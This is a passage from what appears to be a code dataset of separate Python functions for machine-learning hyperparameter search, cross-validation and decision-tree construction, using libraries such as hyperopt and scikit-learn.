scope.int(hp.uniform('max_depth', 5, 15)),\n 'subsample': hp.uniform('subsample', 0.03, 1),\n 'learning_rate' : hp.loguniform('learning_rate', np.log(0.005), np.log(0.5)) - 0.0001,\n 'colsample_bytree': hp.uniform('colsample_bytree', 0.3, 1),\n 'reg_alpha': hp.loguniform('reg_alpha', np.log(0.005), np.log(5)) - 0.0001,\n 'reg_lambda': hp.loguniform('reg_lambda', np.log(1), np.log(5)),\n 'bagging_freq': hp.choice('bagging_freq', [0, 1]),\n 'num_leaves': scope.int(hp.uniform('num_leaves', 10, 128)),\n 'n_estimators': 1000,\n 'boosting': 'gbdt',\n 'objective': 'multiclass',\n 'num_class': 12,\n 'metric': 'None',\n 'is_unbalance': 'true',\n # 'min_data_per_group': 1000,\n 'verbose': -1,\n 'random_seed': 42,\n \n }\n\n # Use the fmin function from Hyperopt to find the best hyperparameters\n best = fmin(score_model, space, algo=tpe.suggest,\n # trials=trials,\n max_evals=hyperopt_niters)\n return best", "def GetPts(self):\n return self.best", "def findBestModel(X_train, X_test, Y_test, model='iForest'):\n if model == 'iForest':\n total_score = 0;\n parameters = [0,0,0,0]\n for max_features in range(1,X_train.shape[1]+1):\n for contamination in range(1,101):\n iForest = IsolationForest(n_estimators = 100, max_features = max_features, contamination = contamination/1000, random_state = 0).fit(X_train)\n \n scores = []\n for x_test,y_test in zip(X_test,Y_test):\n y_hat = iForest.predict(x_test)\n score = evaluate(y_test,y_hat) # returns similarity percentage\n scores.append(score)\n \n if sum(scores) > total_score:\n total_score = sum(scores)\n parameters[0] = max_features\n parameters[1] = contamination/1000\n parameters[2] = total_score\n parameters[3] = scores\n print(parameters, contamination)\n \n return parameters", "def optimize_hyper_parameters(data, predictor, cv_fold, verbose=0):\n # Hyper parameters to explore\n hyper = predictor.hyper_parameters_grid\n regs = list(ParameterGrid(hyper))\n if len(regs) == 0:\n return {}\n if len(regs) == 1:\n return regs[0]\n\n # Optimization\n if verbose:\n print(\"Optimizing...\")\n scores = []\n if cv_fold > 1:\n skf = StratifiedKFold(n_splits=cv_fold, shuffle=True, random_state=SEED)\n\n n_param = 0\n for reg in regs:\n n_param += 1\n if verbose > 1:\n print(\"Optimizing parameter {0} out of {1}...\".format(n_param, len(regs)))\n predictor.set_hyper_parameters(hyper_parameters=reg)\n scores_per_reg = []\n\n # splitting\n if cv_fold > 1:\n for train_idx, test_idx in skf.split(data['x_train'], data['y_train']):\n # Split training data in train and dev (called test as it's more convenient)\n new_data = {'x_train': data['x_train'][train_idx], 'x_test': data['x_train'][test_idx],\n 'y_train': data['y_train'][train_idx], 'y_test': data['y_train'][test_idx]}\n\n # Train classifier\n predictor.fit(new_data)\n score = predictor.score(new_data)\n scores_per_reg.append(score)\n\n else:\n predictor.fit(data) # No cv so we fit on the whole data and we keep the best hyper params\n score = predictor.score(data)\n scores_per_reg.append(score)\n\n # We only keep the mean:\n scores.append(np.mean(scores_per_reg))\n if verbose > 1:\n print(\"Parameters {0} yielded a score of {1}.\".format(reg, scores[-1]))\n\n best = np.argmax(scores) # To find the hyper parameter that yielded the best score on average.\n return regs[best]", "def train_decision_tree():\n train_model(DecisionTreeRegressor(max_depth=3, random_state=42),\n dataset_file_name=DECISION_TREE_DEFAULT_DATASET,\n model_file_name=DECISION_TREE_DEFAULT_MODEL)", "def select_best_model(self, df):\n params = {\n # check whether unigrams give good results or bigrams.\n \"vectorizer__vectorizer\": [self.feature_name_to_class[self.feature]],\n \"vectorizer__ngram_range\": [(1,1), (1,2), (2,2)],\n # check pca parameters\n \"pca__n_components\": [30, 40, 50],\n # stemmer to use for preprocessing\n \"preprocessor__stemmer\": [self.stemmer_name_to_method[self.stemmer_method]],\n 'extractor__punctuations': [True, False]\n\n }\n # select the tunable parameters according to the model\n if self.model == MODELS_SVM:\n params.update({\n 'model__kernel': ['linear'],\n 'model__gamma': [1e-3, 1e-4],\n 'model__C': [0.5, 1, 10]\n })\n elif self.model == MODELS_RANDOM_FOREST:\n params.update({\n 'model__n_estimators': [5, 10, 15]\n })\n elif self.model == MODELS_LOGISTIC_REGRESSION:\n params.update({\n 'model__C': [1.0, 10],\n 'model__tol': [0.001, 0.01, 0.1]\n })\n clf = GridSearchCV(self.get_pipeline(), params, cv=5,\n scoring='%s_macro' % self.training_param)\n X = df.drop([\"Value\"], axis=1)\n Y = df[\"Value\"].values\n clf.fit(X, Y)\n print clf.best_params_\n # print clf.best_estimator_\n print clf.best_score_", "def _get_learned_parameters(nodes, edges, observations):\n parameters = {}\n\n \"\"\" YOUR CODE HERE \"\"\"\n for node in nodes:\n parent_nodes = []\n for edge in edges:\n if node == edge[1]:\n parent_nodes.append(edge[0])\n output = np.array(observations[node])\n inputs = []\n for p_node in parent_nodes:\n inputs.append(observations[p_node])\n if inputs!=[]:\n inputs = np.array(inputs).T\n else:\n inputs = None\n weights = _learn_node_parameter_w(output, inputs)\n variance = _learn_node_parameter_var(output, weights, inputs)\n parameters[node] = {}\n parameters[node][\"variance\"] = variance\n parameters[node][\"bias\"] = weights[0]\n for p_node_index in range(len(parent_nodes)):\n parameters[node][parent_nodes[p_node_index]] = weights[p_node_index+1]\n \"\"\" END YOUR CODE HERE \"\"\"\n\n return parameters", "def greedy_learn(self,node,db,labels,ids):\n if node.depth >= self.maxdepth or len(ids) <= self.minexamples:\n #terminate recursion\n node.pick_best_label(db,labels,ids)\n err = misclassification_error([labels[id] for id in ids])\n if err > 0:\n print \"Reached a leaf and had to make some sacrifices, cost\",err\n print \" depth\",node.depth\n print \" labels\",[labels[id] for id in ids]\n return err\n\n features = self.feature_subset(node,db,labels,ids)\n cost = node.pick_best_split(db,labels,ids,features)\n \n #do a split\n if node.type == 'v':\n #base case: no misclassifications\n \"\"\"\n if cost>0:\n print \"greedy_learn: Warning, pick_best_split indicates a leaf but the cost is nonzero\"\n print \"cost=\",cost,\"misclassification=\",misclassification_error([labels[id] for id in ids])\n print \"# of ids:\",len(ids)\n for i in ids:\n print \"id\",i,\",\",\n for k in range(db.numFeatures()):\n if db[k,i] != None:\n print k,\"=\",db[k,i],\",\",\n print \"label\",labels[i]\n raw_input()\n \"\"\"\n return 0\n elif node.type == 's':\n #print \"Picked feature\",node.feature,\"split\"\n #do a discrete split\n node.children = dict()\n #select sub-indices\n Eids = defaultdict(list)\n noneids = []\n for id in ids:\n v = db[node.feature,id]\n if v is None:\n #item doesn't exist, it's a missing value\n noneids.append(id)\n else:\n Eids[v].append(id)\n #print \" split sizes:\",[len(x) for x in Eids.values()]\n #print \" None ids:\",len(noneids)\n ids = None\n errors = 0\n for v,vids in Eids.iteritems():\n #recurse\n c = DecisionTreeNode(node)\n #print \"Recursing on value\",v\n #print \" ids:\",vids\n errors += self.greedy_learn(c,db,labels,vids+noneids)\n node.children[v] = c\n if c.depth > self.deepest:\n self.deepest = c.depth\n print \"Decision tree learner: Reached node with depth\",self.deepest\n return errors\n else:\n #do an inequality split\n assert node.type == 'i'\n #print \"Picked feature\",node.feature,\"inequality value\",node.value,\"cost\",cost\n leftids = []\n rightids = []\n for id in ids:\n if db[node.feature,id] is not None:\n if db[node.feature,id] <= node.value: leftids.append(id)\n else: rightids.append(id)\n else:\n leftids.append(id)\n rightids.append(id)\n if len(rightids) == len(ids) or len(leftids) == len(ids):\n #due to missing values, this split is useless\n errors = misclassification_error([labels[id] for id in ids])\n print \"useless split on feature\",node.feature,\"value\",node.value,\"misclassification error\",errors\n print \"Left size\",len(leftids),\"right size\",len(rightids)\n raw_input()\n node.pick_best_label(db,labels,ids)\n return errors\n #clear memory associated with ids list\n del ids[:]\n ids = None\n #print \"Left size\",len(leftids),\"right size\",len(rightids)\n c1 = DecisionTreeNode(node)\n c2 = DecisionTreeNode(node)\n #left side\n errors = self.greedy_learn(c1,db,labels,leftids)\n #right side\n errors += self.greedy_learn(c2,db,labels,rightids)\n #restore index\n node.children = {0:c1,1:c2}\n if c1.depth > self.deepest:\n self.deepest = c1.depth\n print \"Decision tree learner: Reached node with depth\",self.deepest\n return errors", "def find_optimal_depth(x_train, x_test, y_train, y_test):\n # declare variables\n max_depths = np.linspace(1, 15, 15, endpoint=True)\n train_results = []\n test_results = []\n # iterate over the different depths\n for depth in max_depths:\n trees = DecisionTreeClassifier(criterion='entropy', max_depth=depth)\n trees.fit(x_train, y_train)\n\n # Add auc score to train list\n train_pred = trees.predict(x_train)\n fpr, tpr, thresholds = roc_curve(y_train, train_pred)\n roc_auc = auc(fpr, tpr)\n train_results.append(roc_auc)\n\n # Add auc score to test list\n test_pred = trees.predict(x_test)\n fpr, tpr, thresholds = roc_curve(y_test, test_pred)\n roc_auc = auc(fpr, tpr)\n test_results.append(roc_auc)\n\n plt.figure(figsize=(8, 5))\n plt.plot(max_depths, train_results, 'b', label='Train AUC')\n plt.plot(max_depths, test_results, 'r', label='Test AUC')\n plt.ylabel('AUC score', fontsize=16)\n plt.xlabel('Tree depth', fontsize=16)\n plt.legend()\n plt.show()\n return", "def get_params(self, deep=True):\n return super()._get_params('estimators', deep=deep)", "def cross_validation(self, x, t, k=5):\n print(\"Cross validation of the Decision Tree Classifier...\")\n bestCriteria = ''\n bestMax_depth= 2\n bestError = float('inf')\n\n N = len(x)\n N_train = math.floor(0.8 * N)\n\n dicCriteria = ['gini', 'entropy']\n min_depth = 2\n max_depth = 40\n\n for crit in dicCriteria:\n for d in range(min_depth, max_depth):\n errors = np.zeros(k)\n\n for j in range(k):\n map_index = list(zip(x, t))\n random.shuffle(map_index)\n random_X, random_t = zip(*map_index)\n\n train_x = random_X[:N_train]\n valid_x = random_X[N_train:]\n train_t = random_t[:N_train]\n valid_t = random_t[N_train:]\n\n self.model = tree.DecisionTreeClassifier(max_depth=d, criterion=crit)\n self.train(train_x, train_t)\n error_valid = np.array([self.error(x_n, t_n)\n for t_n, x_n in zip(valid_t, valid_x)])\n errors[j] = error_valid.mean()\n\n mean_error = np.mean(errors)\n if mean_error < bestError:\n bestError = mean_error\n bestCriteria = crit\n bestMax_depth = d\n print(\"The new best hyper parameters are : \", bestMax_depth, bestCriteria)\n\n print(\"Best hyper parameters are : \", bestMax_depth, bestCriteria)\n print(\"Validation error : \", 100 * bestError, \"%\")\n self.model = tree.DecisionTreeClassifier(max_depth=bestMax_depth, criterion=bestCriteria)\n self.train(x, t)", "def decision_tree(df, variables, test_size):\n from sklearn.model_selection import train_test_split\n from sklearn import tree\n\n # Define input\n X = encoding_df(df, variables)\n\n # Set validation\n y = df['target']\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=42)\n\n clf = tree.DecisionTreeRegressor()\n clf = clf.fit(X_train, y_train)\n\n print(compute_rmse(y_test, clf.predict(X_test)))\n return clf.predict(X_test), y_test", "def __init__(self, max_depth=None, criterion='gini', random_state=0):\n print(\"Initialize the model Decision Tree Classifier... \")\n self.random_state = random_state\n self.model = tree.DecisionTreeClassifier(max_depth=max_depth, criterion=criterion, random_state=random_state)", "def getPredictions(self):\n\t\tself.bestLabel = self.testingProbs.apply(lambda x: x.argmax(),1)", "def decision_tree(df, dt_dict, curr_node,\r\n prev_attr = None, align_dir = None,\r\n depth = -1, no_data = False,\r\n ensemble = None):\r\n \r\n class_count = get_class_count(df)\r\n # get the class label counts for the given dataframe\r\n leaf_node_bool = check_leaf_node(df)\r\n # this function helps to check if we have a leaf node\r\n if leaf_node_bool:\r\n # if its leaf node\r\n curr_node[align_dir] = df['class'].values[0]\r\n # assign the leaf node value\r\n elif no_data:\r\n # if we are out of data points\r\n class_counts = df['class'].value_counts()\r\n # get the class counts\r\n curr_node[align_dir] = np.argmax(class_counts)\r\n # assign the majority class of prev node\r\n else:\r\n entropy_values_series = impurity.entropy_calc(df, ensemble = ensemble)\r\n # calculate the entropy values for each feature\r\n info_gain_dict = {}\r\n # empty dict for information gain\r\n for feature in entropy_values_series.index:\r\n # iterate over each features\r\n impurity.information_gain_calc(df, feature, info_gain_dict)\r\n # function call for information gain calculation\r\n for f in entropy_values_series.index:\r\n # iterate over each feature\r\n information_gain = entropy_values_series[f] - info_gain_dict[f][1]\r\n # calculation of information gain\r\n info_gain_dict[f] = (info_gain_dict[f][0], information_gain)\r\n # update the information gain dict\r\n best_feature = sorted(info_gain_dict, key = lambda x: info_gain_dict[x][1])[-1]\r\n # get the best feature on which to be splitted.\r\n #print(best_feature)\r\n node_value = (best_feature, info_gain_dict[best_feature], class_count[0],\r\n class_count[1])\r\n # get the node value\r\n \r\n if not leaf_node_bool and align_dir:\r\n # growing the tree\r\n if depth == 0:\r\n if node_value[2] > node_value[3]:\r\n node_value = 0\r\n else:\r\n node_value = 1\r\n curr_node[align_dir] = node_value\r\n return 0\r\n else:\r\n curr_node[align_dir] = {node_value:{}}\r\n curr_node = curr_node[align_dir][node_value]\r\n else:\r\n dt_dict[node_value] = {}\r\n curr_node = dt_dict[node_value]\r\n \r\n data_split(df, best_feature, info_gain_dict, \r\n dt_dict, curr_node, depth)\r\n # function call for data split\r", "def test_find_best_model(self):\n parameters = dict(\n model=('spherical', 'gaussian', 'exponential', 'matern')\n )\n gs = GridSearchCV(\n VariogramEstimator(n_lags=15, normalize=False),\n parameters,\n cv=3\n )\n\n gs = gs.fit(self.c, self.v)\n\n # Python 3.6 yields 'exponential', \n # while 3.7, 3.8 yield 'gaussian' - this is so stupid\n self.assertTrue(gs.best_params_['model'] in ['gaussian', 'exponential'])", "def extractBestAlgorithms(args = algs2009, f_factor=2,\n target_lb=1e-8, target_ub=1e22):\n\n # TODO: use pproc.TargetValues class as input target values\n # default target values:\n targets = pproc.TargetValues(\n 10**np.arange(np.log10(max((1e-8, target_lb))),\n np.log10(target_ub) + 1e-9, 0.2))\n # there should be a simpler way to express this to become the\n # interface of this function\n\n print 'Loading algorithm data from given algorithm list...\\n' \n\n verbose = True\n dsList, sortedAlgs, dictAlg = pproc.processInputArgs(args, verbose=verbose)\n\n print 'This may take a while (depending on the number of algorithms)'\n\n selectedAlgsPerProblem = {}\n for f, i in pproc.dictAlgByFun(dictAlg).iteritems():\n for d, j in pproc.dictAlgByDim(i).iteritems():\n selectedAlgsPerProblemDF = []\n best = BestAlgSet(j)\n \n for i in range(0, len(best.target)):\n t = best.target[i]\n # if ((t <= target_ub) and (t >= target_lb)):\n if toolsstats.in_approximately(t,\n targets((f, d), discretize=True)):\n # add best for this target:\n selectedAlgsPerProblemDF.append(best.algs[i])\n \n # add second best or all algorithms that have an ERT\n # within a factor of f_factor of the best:\n secondbest_ERT = np.infty\n secondbest_str = ''\n secondbest_included = False \n for astring in j:\n currdictalg = dictAlg[astring].dictByDim()\n if currdictalg.has_key(d):\n curralgdata = currdictalg[d][f-1] \n currERT = curralgdata.detERT([t])[0]\n if (astring != best.algs[i]):\n if (currERT < secondbest_ERT):\n secondbest_ERT = currERT\n secondbest_str = astring\n if (currERT <= best.detERT([t])[0] * f_factor):\n selectedAlgsPerProblemDF.append(astring)\n secondbest_included = True\n if not (secondbest_included) and (secondbest_str != ''):\n selectedAlgsPerProblemDF.append(secondbest_str)\n \n if len(selectedAlgsPerProblemDF) > 0:\n selectedAlgsPerProblem[(d, f)] = selectedAlgsPerProblemDF\n \n print 'pre-processing of function', f, 'done.' \n \n print 'loading of best algorithm(s) data done.'\n \n countsperalgorithm = {}\n for (d, f) in selectedAlgsPerProblem:\n print 'dimension:', d, ', function:', f\n setofalgs = set(selectedAlgsPerProblem[d,f])\n \n # now count how often algorithm a is best for the extracted targets\n for a in setofalgs:\n # use setdefault to initialize with zero if a entry not existant:\n countsperalgorithm.setdefault((d, a), 0) \n countsperalgorithm[(d,a)] += selectedAlgsPerProblem[d,f].count(a)\n \n selectedalgsperdimension = {}\n for (d,a) in sorted(countsperalgorithm):\n if not selectedalgsperdimension.has_key(d):\n selectedalgsperdimension[d] = []\n selectedalgsperdimension[d].append((countsperalgorithm[(d,a)], a))\n \n for d in sorted(selectedalgsperdimension):\n print d, 'D:'\n for (count, alg) in sorted(selectedalgsperdimension[d], reverse=True):\n print count, alg\n print '\\n'\n \n \n print \" done.\"\n \n return selectedalgsperdimension", "def get_best_hyper_parameters(self, estimator, parameters: dict,\n search_method='GridSearchCV', cv=5,\n scoring='r2', n_jobs=-1, verbose=0):\n self.log(f\"{self.cur_file_path}\\t\\tInfo: train method invoked!\")\n\n if search_method == 'RandomizedSearchCV':\n search_cv = RandomizedSearchCV(\n estimator=estimator,\n param_distributions=parameters,\n cv=cv,\n scoring=scoring,\n n_jobs=n_jobs,\n verbose=verbose)\n else:\n search_cv = GridSearchCV(\n estimator=estimator,\n param_grid=parameters,\n cv=cv,\n scoring=scoring,\n n_jobs=n_jobs,\n verbose=verbose)\n\n search_cv.fit(self.trainX, self.trainY)\n return search_cv.best_params_", "def build_tree(self, rows, attribute_list, depth=1, parent_rows=None):\n if len(rows) == 0:\n if parent_rows is not None:\n label_map = DecisionTree.get_count_by_attribute_value(parent_rows, self.target_attribute)\n return DecisionTree.DecisionNode(label=DecisionTree.get_max_value_in_dictionary(label_map))\n else:\n raise ValueError(\"Reached a decision node which had zero rows but was not\"\n \"provided with a parent node\")\n if self.max_depth is not None and depth == self.max_depth:\n label_map = DecisionTree.get_count_by_attribute_value(rows, self.target_attribute)\n return DecisionTree.DecisionNode(label=DecisionTree.get_max_value_in_dictionary(label_map))\n\n try:\n splitting_func = {\"entropy\": self.get_entropy,\n \"gini\": self.get_gini}.get(self.splitting_criteria)\n except KeyError:\n print(\"Program only supports entropy and gini as splitting criteria. Provided criteria was \" +\n self.splitting_criteria)\n raise ValueError(\"Incorrect parameter value passed for splitting criteria\")\n\n value_before_split = splitting_func(rows)\n\n if len(attribute_list) == 0 or value_before_split == 0:\n label_map = DecisionTree.get_count_by_attribute_value(rows, self.target_attribute)\n return DecisionTree.DecisionNode(label=DecisionTree.get_max_value_in_dictionary(label_map))\n\n if len(attribute_list) == 1 and attribute_list[0] == self.target_attribute:\n label_map = DecisionTree.get_count_by_attribute_value(parent_rows, self.target_attribute)\n return DecisionTree.DecisionNode(label=DecisionTree.get_max_value_in_dictionary(label_map))\n\n best_gain = -np.inf\n best_criteria = None\n best_attribute_partitions = None\n\n # Find the attribute having the best split \"\n\n best_attribute_partitions, best_criteria = self.get_best_attribute_for_split(attribute_list,\n best_attribute_partitions,\n best_criteria, best_gain,\n rows, splitting_func,\n value_before_split)\n branches = {}\n for domain_value in self.attribute_domains[best_criteria]:\n branch_attr_list = list(attribute_list)\n branch_attr_list.remove(best_criteria)\n if domain_value in best_attribute_partitions.keys():\n partition_dataset = best_attribute_partitions[domain_value]\n branches[domain_value] = self.build_tree(rows=partition_dataset,\n attribute_list=branch_attr_list,\n parent_rows=rows,\n depth=depth+1)\n else:\n branches[domain_value] = self.build_tree(rows=[],\n attribute_list=branch_attr_list,\n parent_rows=rows,\n depth=depth+1)\n return DecisionTree.DecisionNode(attribute_name=best_criteria, branches=branches)", "def model_3_parameters(num_features, num_classes, image_info):\n parameters = {}\n parameters['num_features'] = num_features\n parameters['num_classes'] = num_classes\n parameters['n_estimators'] = image_info['n_estimators']\n min_child_samples = image_info['min_child_samples']\n parameters['min_child_samples'] = min_child_samples\n \n # Parameters message\n with open(OUTPUT_FILE, 'a') as f:\n f.write(\"min_child_samples: {}\\n\\n\".format(min_child_samples))\n \n return parameters", "def search(x_data, y_data, n = 5):\r\n alpha = np.arange(0.01, 8, 0.01)\r\n param_grid = {'alpha' : alpha} \r\n clf = MultinomialNB() \r\n grid_search = GridSearchCV(clf, param_grid, cv=n)\r\n grid_search.fit(x_data, y_data)\r\n return grid_search.best_params_", "def findRFBestDepth():\n resultList = []\n BestScore = 0\n # iterate through different max_depths from 1 to 19\n for max_depth in range(1,20):\n rforest = ensemble.RandomForestClassifier(max_depth=max_depth, n_estimators=100)\n trainng_score = []\n testing_score = []\n # run 10 different cross-validation\n for index in range(10):\n # split into cross-validation sets.\n cv_data_train, cv_data_test, cv_target_train, cv_target_test = \\\n cross_validation.train_test_split(X_train, y_train, test_size=0.1)\n\n # fit the model using the cross-validation data\n # and tune parameter, such as max_depth here\n rforest = rforest.fit(cv_data_train, cv_target_train)\n trainng_score += [rforest.score(cv_data_train,cv_target_train)]\n testing_score += [rforest.score(cv_data_test,cv_target_test)]\n\n # Compute the average score for both traning and testing data\n trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)\n testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)\n\n # find the best score\n if testing_avgScore > BestScore:\n BestScore = testing_avgScore\n best_depth = max_depth\n resultList += [[best_depth, trainng_avgScore, testing_avgScore]]\n print ('The best average score and the corresponding max_depth is: ')\n return BestScore, best_depth", "def brute_tree(XTRAIN,istopTRAIN,XTEST,istopTEST):\n \n ntrain=XTRAIN.shape[0]\n ntest=XTEST.shape[0]\n \n if np.sum(istopTRAIN)==0:\n return 0,[]\n\n cost0=np.zeros(Ngammas*Nreps)\n cost1=np.zeros(Ngammas*Nreps)\n cost0test=np.zeros(Ngammas*Nreps)\n cost1test=np.zeros(Ngammas*Nreps)\n \n precisionTRAIN=np.zeros(Ngammas*Nreps)\n precisionTEST=np.zeros(Ngammas*Nreps)\n recallTEST=np.zeros(Ngammas*Nreps)\n rate=np.zeros(Ngammas*Nreps)\n \n for iii in range(Ngammas):\n \n gamma=GAMMA[iii]\n \n for jjj in range(Nreps):\n \n \"\"\" train a tree using training data with random splitting \"\"\"\n \n tree_hyperparameters['class_weight']={0:1,1:gamma}\n clf=tree.DecisionTreeClassifier(**tree_hyperparameters)\n clf.fit(XTRAIN,istopTRAIN)\n \n \"\"\"\" record costs and precision on validation data \"\"\"\n \n pTRAIN=clf.predict(XTRAIN)\n precisionTRAIN[iii*Nreps+jjj]=np.divide(sum(1 for i in range(ntrain) if pTRAIN[i] == 1 and istopTRAIN[i]==1),sum(pTRAIN))\n cost0[iii*Nreps+jjj]=sum(1 for i in range(ntrain) if pTRAIN[i] == 1 and istopTRAIN[i]==0)\n cost1[iii*Nreps+jjj]=sum(1 for i in range(ntrain) if pTRAIN[i] == 0 and istopTRAIN[i]==1)\n \n \"\"\" record precision on test data \"\"\"\n \n pTEST=clf.predict(XTEST)\n precisionTEST[iii*Nreps+jjj]=np.divide(sum(1 for i in range(ntest) if pTEST[i] == 1 and istopTEST[i]==1),sum(pTEST))\n recallTEST[iii*Nreps+jjj]=sum(1 for i in range(ntest) if pTEST[i] == 1 and istopTEST[i]==1)/sum(istopTEST)\n cost0test[iii*Nreps+jjj]=sum(1 for i in range(ntest) if pTEST[i] == 1 and istopTEST[i]==0)\n cost1test[iii*Nreps+jjj]=sum(1 for i in range(ntest) if pTEST[i] == 0 and istopTEST[i]==1)\n \n \"\"\" record positive rate on full data \"\"\"\n \n rate[iii*Nreps+jjj]=(sum(pTRAIN)+sum(pTEST))/(ntrain+ntest)\n \n \"\"\" Compute Pareto front for validation data \"\"\"\n \n Pareto = Lower_Convex_Hull(np.concatenate((cost0.reshape(-1,1),cost1.reshape(-1,1)),1))\n \n \"\"\" make some nice plots for whoever is watching \"\"\"\n \n plt.figure(figsize=(10,5))\n plt.subplot(121)\n plt.plot(cost0,cost1,'.')\n plt.plot(cost0[Pareto],cost1[Pareto],'d')\n plt.xlabel('errors on class zero training data')\n plt.ylabel('errors on class one training data')\n\n plt.subplot(122)\n plt.plot(cost0test,cost1test,'.')\n plt.plot(cost0test[Pareto],cost1test[Pareto],'d')\n plt.xlabel('errors on class zero test data')\n plt.ylabel('errors on class one test data')\n plt.show()\n \n plt.figure(figsize=(15,5))\n plt.subplot(131)\n plt.semilogy(precisionTRAIN,rate,'.')\n plt.semilogy(precisionTRAIN[Pareto],rate[Pareto],'d')\n plt.xlabel('precision on training data')\n plt.ylabel('positive rate')\n\n plt.subplot(132) \n plt.semilogy(precisionTEST,rate,'.')\n plt.semilogy(precisionTEST[Pareto],rate[Pareto],'d')\n plt.xlabel('precision on test data')\n plt.ylabel('positive rate')\n\n plt.subplot(133) \n plt.plot(precisionTEST,recallTEST,'.')\n plt.plot(precisionTEST[Pareto],recallTEST[Pareto],'d')\n plt.xlabel('precision on test data')\n plt.ylabel('recall on test data')\n plt.show() \n \n return {'cost0':cost0,'cost1':cost1,'cost0test':cost0test,'cost1test':cost1test,'precisionTRAIN':precisionTRAIN,'precisionTEST':precisionTEST,'recallTEST':recallTEST,'rate':rate,'Pareto':Pareto}", "def showSolution(bestTree)->list:\r\n bestSon = bestTree\r\n solved = bestTree.value\r\n minDepth = bestTree.depth\r\n solution = []\r\n while bestSon.sons:\r\n #print(bestSon.state)\r\n solution.append(bestSon.state)\r\n bestSon = getBestSon(bestSon, minDepth)\r\n #print(bestSon.state)\r\n solution.append(bestSon.state)\r\n if solved == 1:\r\n #print(\"Minimum necessary total trips:\", bestSon.depth)\r\n solution.append(minDepth)\r\n else:\r\n solution.append(-1)\r\n return solution", "def find_best_k(x_train, y_train, ks):\n params = {'n_neighbors': ks}\n knn = neighbors.KNeighborsRegressor()\n model = GridSearchCV(knn, params, cv=5)\n model.fit(x_train, y_train)\n best_k = model.best_params_\n return best_k", "def hyperparameter_cv(X_data, y_data, hyperparameters):\n\n # Create Grid of hyperparameters\n grid = cartesian_product(hyperparameters)\n\n # Loop through hyperparameters \n best_score = 0\n for hyperparameter in grid:\n # Initialize Modle\n model = svm.SVC(kernel='linear', **hyperparameter)\n\n # Train and Get Accuracy\n print(f\"Training using hyperparameters: {hyperparameter}\")\n score = cross_validation_score(X_data, y_data, model, folds=5)\n print(f\"Accuracy Score: {score}\")\n\n if score > best_score:\n best_score = score\n best_parameters = hyperparameter\n \n return best_score, best_parameters", "def variable_ranking(self):\n self.grow_trees()\n dist_classes = self.dist_classes\n oob = self.forest.oob_set_generator()\n oob_length, First, elt_vals, var_vals = len(oob), True, {}, {}\n succ_rate, dist_succ_rate, dist_order = 0, 0, 0\n for var in self.variables:\n var_range = list(variable_range(self.data, var))\n range_len = len(var_range)\n print var\n permution = None\n permuted_succ, perm_dist_succ = 0, 0\n for elts in oob:\n if First:\n actual = self.data[elts][self.prediction_index]\n elt_vals[elts] = actual\n predicted = self.forest.test_predict(self.data[elts], elts)\n if actual in dist_classes:\n dist_order += 1\n if actual == predicted:\n succ_rate += 1\n if actual in dist_classes:\n dist_succ_rate += 1\n if var[1] == 'd':\n permution = int(math.floor(uniform(0, 1)*range_len))\n permution = var_range[permution]\n else:\n permution = uniform(0, 1)*(var_range[1] - var_range[0])\n perm_tuple = self.data[elts][:var[0]] + [permution] + self.data[elts][var[0]+1:]\n permuted_prediction = self.forest.predict(perm_tuple)\n actual = elt_vals[elts]\n if actual == permuted_prediction:\n permuted_succ += 1\n if actual in dist_classes:\n perm_dist_succ += 1\n if First:\n succ_rate = float(succ_rate)/oob_length\n dist_succ_rate = float(dist_succ_rate)/dist_order\n First = False\n permuted_succ = float(permuted_succ)/oob_length\n perm_dist_succ = float(perm_dist_succ)/dist_order\n print \"Originally a \", succ_rate, \" success rate, with permution to \", permuted_succ\n print \"A difference of \", succ_rate - permuted_succ\n print \"WRT Distinguised classes, a success rate of:\", dist_succ_rate, 'with permution to ', perm_dist_succ\n print \"A difference of \", dist_succ_rate - perm_dist_succ\n var_vals[var] = succ_rate - permuted_succ\n var_vals[(var, 'd')] = dist_succ_rate - perm_dist_succ\n var_vals = sorted(var_vals.items(), key=lambda x: x[1], reverse=True)\n for x in var_vals:\n print x[0], x[1]", "def hyper_parameter_test(elements, args):\n\n greedy_factors = np.linspace(\n args.greedy_start, args.greedy_end, args.greedy_num_samples\n )\n k_values = np.arange(args.k_start - 1, args.k_end, args.k_step) + 1\n k_values = [int(k) for k in k_values]\n if args.gc_prune_test:\n gc_prune = [True, False]\n else:\n gc_prune = [True]\n if args.forest:\n forest = [True, False]\n else:\n forest = [False]\n \n all_runs = {}\n factors = [p for p in product(forest, greedy_factors, k_values, gc_prune)]\n for factor in factors:\n all_runs[factor] = []\n all_signatures_used = []\n splitter = RepeatedKFold(args.n_split, args.n_repeat, random_state = args.random_seed)\n i = 0\n for tree_indexes, search_indexes in splitter.split(elements):\n print(\"current run number:\", i)\n i+=1\n tree_elems = elements[tree_indexes]\n search_elems = elements[search_indexes]\n \n if args.forest:\n forest = VPForest(\n tree_elems, random=args.random_vp, max_leaf_size=args.leaf_size\n )\n tree = VPTree(tree_elems, random=args.random_vp, max_leaf_size=args.leaf_size)\n tree_elem_names = [elem.identifier for elem in tree_elems]\n search_elem_names = [elem.identifier for elem in search_elems]\n all_signatures_used.append((tree_elem_names, search_elem_names))\n start = time.time()\n for factor in factors:\n if factor[0]:\n run_NNS = one_nn_search_run(forest, search_elems, factor, args.parallel)\n else:\n run_NNS = one_nn_search_run(tree, search_elems, factor, args.parallel)\n all_runs[factor].append(run_NNS)\n\n print(\"search time:\", time.time()-start)\n data = NNData(all_runs, all_signatures_used, factors)\n with open(args.o, \"wb\") as f:\n pickle.dump(data, f)", "def _find_rf_params(df, metrics):\n context = ramp.DataContext(data=df)\n config = ramp.Configuration(target=\"target\",\n features=[ramp.BaseFeature(x) for x in metrics])\n x, y = ramp.models.get_xy(config, context)\n\n n = len(metrics)\n param_grid = dict(max_features=range(int(math.ceil(math.sqrt(n))), n+1, 3),\n n_estimators=range(20, 101, 20))\n grid = sklearn.grid_search.GridSearchCV(sklearn.ensemble.RandomForestClassifier(),\n param_grid=param_grid,\n cv=sklearn.cross_validation.StratifiedKFold(y=y, k=3))\n grid.fit(x, y)\n print grid.best_estimator_\n out = {}\n for attr in param_grid.keys():\n out[attr] = getattr(grid.best_estimator_, attr)\n return out", "def buildTree(rows, maxDepth = None, scoref=entropy, depth = 0):\n #A base condition for the recursion. Check if this branch of a split has no data\n if len(rows)==0:\n return decisionNode( )\n newDepth = depth + 1 #Calculate the depth of the next split.\n #Check if the 